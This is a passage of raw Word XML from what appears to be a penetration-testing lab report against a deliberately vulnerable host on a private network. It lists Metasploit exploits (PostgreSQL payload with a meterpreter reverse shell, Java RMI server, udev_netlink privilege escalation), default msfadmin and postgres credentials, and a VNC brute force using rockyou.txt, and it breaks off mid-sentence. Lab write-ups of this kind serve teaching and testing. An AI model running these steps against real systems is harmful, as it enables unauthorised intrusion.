    <w:p w14:paraId="452F3AE1" w14:textId="6B306023" w:rsidR="00C107DA" w:rsidRDefault="007A110C" w:rsidP="007A110C">
      <w:r>
        <w:t xml:space="preserve">use exploit/linux/postgres/postgres_payload   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3706DDC9" w14:textId="77777777" w:rsidR="00252A5D" w:rsidRDefault="00252A5D" w:rsidP="007A110C"/>
    <w:p w14:paraId="5746B705" w14:textId="7D332CA3" w:rsidR="00062B58" w:rsidRDefault="00252A5D" w:rsidP="00384326">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01E47515" wp14:editId="19BCDB3B">
            <wp:extent cx="5736590" cy="1463040"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="9979826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6590" cy="1463040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAF527A" w14:textId="6C93E07B" w:rsidR="00252A5D" w:rsidRDefault="00D93FF2" w:rsidP="00252A5D">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B285783" w14:textId="6C07AA2D" w:rsidR="00384326" w:rsidRDefault="00D93FF2" w:rsidP="00384326">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0ADEFD02" wp14:editId="70D9BBD4">
            <wp:extent cx="5736590" cy="3719195"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8852946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6590" cy="3719195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B15198A" w14:textId="7A902D14" w:rsidR="00D77F85" w:rsidRDefault="00D77F85" w:rsidP="00D77F85">
      <w:r w:rsidRPr="00D77F85">
        <w:t xml:space="preserve">set RHOSTS 192.168.254.186   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE41D61" w14:textId="5617D013" w:rsidR="00D77F85" w:rsidRDefault="006A7AF2" w:rsidP="006A7AF2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A9659D1" wp14:editId="00A98889">
            <wp:extent cx="5731510" cy="976630"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1064" name="Picture 1064"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064" name="Picture 1064" descr="A screen shot of a computer code&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId73"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="976630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3576CC7A" w14:textId="77777777" w:rsidR="00833660" w:rsidRDefault="00833660" w:rsidP="006A7AF2">
      <w:r w:rsidRPr="00833660">
        <w:t xml:space="preserve">When I loaded postgres_payload it defaultedset to using :  [*] Using configured payload linux/x86/meterpreter/reverse_tcp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765C278E" w14:textId="77777777" w:rsidR="00833660" w:rsidRDefault="00833660" w:rsidP="006A7AF2">
      <w:r w:rsidRPr="00833660">
        <w:t xml:space="preserve">I need to set the local host  set LHOST 192.168.254.182    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FE8A1E" w14:textId="298F37CB" w:rsidR="006A7AF2" w:rsidRDefault="00833660" w:rsidP="006A7AF2">
      <w:r w:rsidRPr="00833660">
        <w:t xml:space="preserve">run   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEE388C" w14:textId="3CFC16F8" w:rsidR="00FB0980" w:rsidRDefault="00FB0980" w:rsidP="006A7AF2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E0A0635" wp14:editId="11B7F1B8">
            <wp:extent cx="5731510" cy="1105925"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1110" name="Picture 111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10" name="Picture 1110" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId74"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1105925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A15AFD6" w14:textId="0CC713B4" w:rsidR="00FB0980" w:rsidRDefault="00F205D5" w:rsidP="006A7AF2">
      <w:r w:rsidRPr="00F205D5">
        <w:t xml:space="preserve">To switch from meterpreter &gt; command prompt type: shell   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC4CE31" w14:textId="14123554" w:rsidR="00F205D5" w:rsidRDefault="00742104" w:rsidP="006A7AF2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19949196" wp14:editId="4CB6BDEE">
            <wp:extent cx="5731510" cy="1264220"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1112" name="Picture 1112" descr="A computer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112" name="Picture 1112" descr="A computer screen with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId75"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1264220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="563161B5" w14:textId="183F6226" w:rsidR="00742104" w:rsidRDefault="002C41B1" w:rsidP="006A7AF2">
      <w:r w:rsidRPr="002C41B1">
        <w:t xml:space="preserve">Able to start to execute commands connected as postgres   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1019789C" w14:textId="77777777" w:rsidR="00CD2270" w:rsidRDefault="00CD2270" w:rsidP="00CD2270">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NVT: PostgreSQL Default Credentials (PostgreSQL Protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C34B417"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4CEDB1C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cpe:/a:postgresql:postgresql:8.3.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C99D1E"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Detected by PostgreSQL Detection (TCP) (OID: 1.3.6.1.4.1.25623.1.0.100151)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329D7DD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Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF150D5"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It was possible to login into the remote PostgreSQL as user postgres using weak credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB6F044"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Quality of Detection: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072C4855"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Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DFA05F"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56" w:hAnsi="F56" w:cs="F56"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>It was possible to login as user postgres with password "postgres".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46183EE4"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Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B319DA0"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53" w:hAnsi="F53" w:cs="F53"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Solution type: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2978D313"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Change the password as soon as possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B46527A"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Vulnerability Detection Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D6CC3D"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Details: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F56" w:hAnsi="F56" w:cs="F56"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PostgreSQL Default Credentials (PostgreSQL Protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126629AA" w14:textId="77777777" w:rsidR="00CD2270" w:rsidRDefault="00CD2270" w:rsidP="00CD2270">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OID:1.3.6.1.4.1.25623.1.0.103552</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745908A4"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Version used: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F56" w:hAnsi="F56" w:cs="F56"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2023-07-25T05:05:58Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AD6A06" w14:textId="77777777" w:rsidR="00CD2270" w:rsidRDefault="00CD2270" w:rsidP="00CD2270">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="F53" w:hAnsi="F53" w:cs="F53"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F53" w:hAnsi="F53" w:cs="F53"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Product Detection Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C93822" w14:textId="77777777" w:rsidR="00CD2270" w:rsidRDefault="00CD2270" w:rsidP="00CD2270">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="F56" w:hAnsi="F56" w:cs="F56"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Product: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F56" w:hAnsi="F56" w:cs="F56"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cpe:/a:postgresql:postgresql:8.3.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBE6B43" w14:textId="637B1C8F" w:rsidR="00CD2270" w:rsidRDefault="00CD2270" w:rsidP="00CD2270">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Method: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F56" w:hAnsi="F56" w:cs="F56"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PostgreSQL Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F275BF" w14:textId="48170073" w:rsidR="00313769" w:rsidRDefault="00313769" w:rsidP="008314C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc155092377"/>
      <w:r w:rsidRPr="00313769">
        <w:t xml:space="preserve">Port 23 </w:t>
      </w:r>
      <w:r w:rsidR="00244791">
        <w:t>telnet</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="45A145DB" w14:textId="77777777" w:rsidR="00792A92" w:rsidRDefault="00792A92" w:rsidP="00792A92">
      <w:r>
        <w:t xml:space="preserve">auxiliary/scanner/telnet/telnet_version  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C63C68" w14:textId="72884894" w:rsidR="00792A92" w:rsidRDefault="00792A92" w:rsidP="00792A92">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">set  RHOST  192.168.254.186  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B16ECEA" w14:textId="1CA2509D" w:rsidR="00994E96" w:rsidRDefault="00994E96" w:rsidP="00792A92">
      <w:r>
        <w:t>set USERNAME msfadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3787AAF2" w14:textId="05DF592F" w:rsidR="00EE7E34" w:rsidRDefault="00EE7E34" w:rsidP="00792A92">
      <w:r>
        <w:t>set PASSWORD msfadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1AEA95" w14:textId="4DE00C78" w:rsidR="00994E96" w:rsidRDefault="00994E96" w:rsidP="00792A92">
      <w:r w:rsidRPr="00994E96">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="274B3A80" wp14:editId="65011EF7">
            <wp:extent cx="5731510" cy="878840"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10068672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67266" name="Picture 1" descr="A black background with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="878840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E80AB9" w14:textId="0D2C20CF" w:rsidR="0016718B" w:rsidRDefault="00A815E3" w:rsidP="00792A92">
      <w:r w:rsidRPr="00A815E3">
        <w:t>This module will scan a range of machines and prints the banner</w:t>
      </w:r>
      <w:r w:rsidR="00F7538A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00266BE8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4563B693" w14:textId="1ADA369A" w:rsidR="00EF129C" w:rsidRDefault="00EF129C" w:rsidP="00792A92">
      <w:r>
        <w:t>The test is to see if telnet is running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24929312" w14:textId="2B81E151" w:rsidR="00792A92" w:rsidRDefault="009A65C2" w:rsidP="008314C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc155092378"/>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00792A92">
        <w:t xml:space="preserve">ort 1099 </w:t>
      </w:r>
      <w:r w:rsidR="00807352">
        <w:t>java_rmi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="2FFD07DA" w14:textId="7B345ECA" w:rsidR="00792A92" w:rsidRDefault="00792A92" w:rsidP="00792A92">
      <w:r>
        <w:t xml:space="preserve">use  exploit/multi/misc/java_rmi_server   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4F46B5" w14:textId="13662806" w:rsidR="0011222E" w:rsidRPr="00792A92" w:rsidRDefault="00954F70" w:rsidP="00792A92">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D60CE07" wp14:editId="52E262BF">
            <wp:extent cx="5736590" cy="1487805"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="320373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6590" cy="1487805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E74C0A2" w14:textId="77777777" w:rsidR="009A0D15" w:rsidRDefault="0011222E" w:rsidP="0011222E">
      <w:r w:rsidRPr="0011222E">
        <w:t xml:space="preserve">Set RHOST 192.168.254.186 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01359B8D" w14:textId="7F171805" w:rsidR="00AA0FF2" w:rsidRDefault="00AA0FF2" w:rsidP="0011222E">
      <w:r>
        <w:t>Set HTTPDELAY 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1886DB" w14:textId="1D317C28" w:rsidR="00D93FF2" w:rsidRDefault="0011222E" w:rsidP="0011222E">
      <w:r w:rsidRPr="0011222E">
        <w:t xml:space="preserve">run   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B964DA8" w14:textId="7709A862" w:rsidR="00AA0FF2" w:rsidRDefault="00AA0FF2" w:rsidP="0011222E"/>
    <w:p w14:paraId="458BFFBF" w14:textId="34017EB0" w:rsidR="00DF50CE" w:rsidRDefault="00DF50CE" w:rsidP="0011222E"/>
    <w:p w14:paraId="0702D853" w14:textId="77777777" w:rsidR="0025562C" w:rsidRDefault="0025562C" w:rsidP="0011222E"/>
    <w:p w14:paraId="3688F0CF" w14:textId="7C6CCD07" w:rsidR="00433EE2" w:rsidRDefault="00FC25AD" w:rsidP="009F2B48">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="011D76F4" wp14:editId="7E28C079">
            <wp:extent cx="5736590" cy="4364990"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21098904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6590" cy="4364990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5569872A" w14:textId="1ACF004F" w:rsidR="008E1FB7" w:rsidRDefault="008E1FB7" w:rsidP="008E1FB7">
      <w:r w:rsidRPr="008E1FB7">
        <w:t xml:space="preserve">This connected as root </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0756F5CC" w14:textId="7158BDC6" w:rsidR="000520F2" w:rsidRDefault="000520F2" w:rsidP="008E1FB7">
      <w:r>
        <w:t xml:space="preserve">I used this session to run </w:t>
      </w:r>
      <w:r w:rsidR="00837F9F" w:rsidRPr="00837F9F">
        <w:t>exploit/linux/local/udev_netlink</w:t>
      </w:r>
      <w:r w:rsidR="00837F9F">
        <w:t xml:space="preserve"> using this session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31017171" w14:textId="3A92335A" w:rsidR="001563F3" w:rsidRDefault="001563F3" w:rsidP="001563F3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc155092379"/>
      <w:r>
        <w:t>Port 5900</w:t>
      </w:r>
      <w:r w:rsidR="0074513C">
        <w:t xml:space="preserve"> VNC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="079812B2" w14:textId="40561FDD" w:rsidR="002415C7" w:rsidRDefault="002415C7" w:rsidP="002415C7">
      <w:r>
        <w:t xml:space="preserve">Password obtained through brute force attack.  use auxiliary(scanner/vnc/vnc_login)    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E524365" w14:textId="24F045AC" w:rsidR="00F34884" w:rsidRDefault="00F34884" w:rsidP="002415C7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30AD9201" wp14:editId="4D9826BA">
                <wp:extent cx="5731510" cy="4417153"/>
                <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
                <wp:docPr id="13630" name="Group 13630"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5731510" cy="4417153"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5734812" cy="4419600"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1201" name="Picture 1201"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId79"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5734812" cy="2947416"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1203" name="Picture 1203"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId80"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="2947416"/>
                            <a:ext cx="5734812" cy="1472184"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="6EA65DEF" id="Group 13630" o:spid="_x0000_s1026" style="width:451.3pt;height:347.8pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="57348,441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&#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">
                <v:shape id="Picture 1201" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:57348;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">
                  <v:imagedata r:id="rId81" o:title=""/>
                </v:shape>
                <v:shape id="Picture 1203" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;top:29474;width:57348;height:14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">
                  <v:imagedata r:id="rId82" o:title=""/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="517D0437" w14:textId="77777777" w:rsidR="007739F9" w:rsidRDefault="007739F9" w:rsidP="002415C7"/>
    <w:p w14:paraId="64D04CA0" w14:textId="77777777" w:rsidR="007739F9" w:rsidRDefault="007739F9" w:rsidP="007739F9">
      <w:r>
        <w:t xml:space="preserve">set RHOST 192.168.254.186 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15242A88" w14:textId="77777777" w:rsidR="007739F9" w:rsidRDefault="007739F9" w:rsidP="007739F9">
      <w:r>
        <w:t xml:space="preserve">make sure the report port is set to 5900 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0291C244" w14:textId="77777777" w:rsidR="007739F9" w:rsidRDefault="007739F9" w:rsidP="007739F9">
      <w:r>
        <w:t xml:space="preserve">set RPORT 5900 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395D6010" w14:textId="77777777" w:rsidR="007739F9" w:rsidRDefault="007739F9" w:rsidP="007739F9">
      <w:r>
        <w:t xml:space="preserve">set the password file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A539ED7" w14:textId="0CD042D9" w:rsidR="00FC25AD" w:rsidRDefault="007739F9" w:rsidP="007739F9">
      <w:r>
        <w:t xml:space="preserve">set pass_file/home/kali/Documents/rockyou.txt run   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B532F0" w14:textId="2ABAFDAF" w:rsidR="00F54D0B" w:rsidRDefault="002F5473" w:rsidP="009F2B48">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5595F804" wp14:editId="070A21AF">
            <wp:extent cx="5730875" cy="1341120"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="161544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1341120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A38595" w14:textId="3E1C1678" w:rsidR="00BF414F" w:rsidRDefault="00BF414F" w:rsidP="00ED1437">
      <w:r>
        <w:t xml:space="preserve">Found the </w:t>
      </w:r>
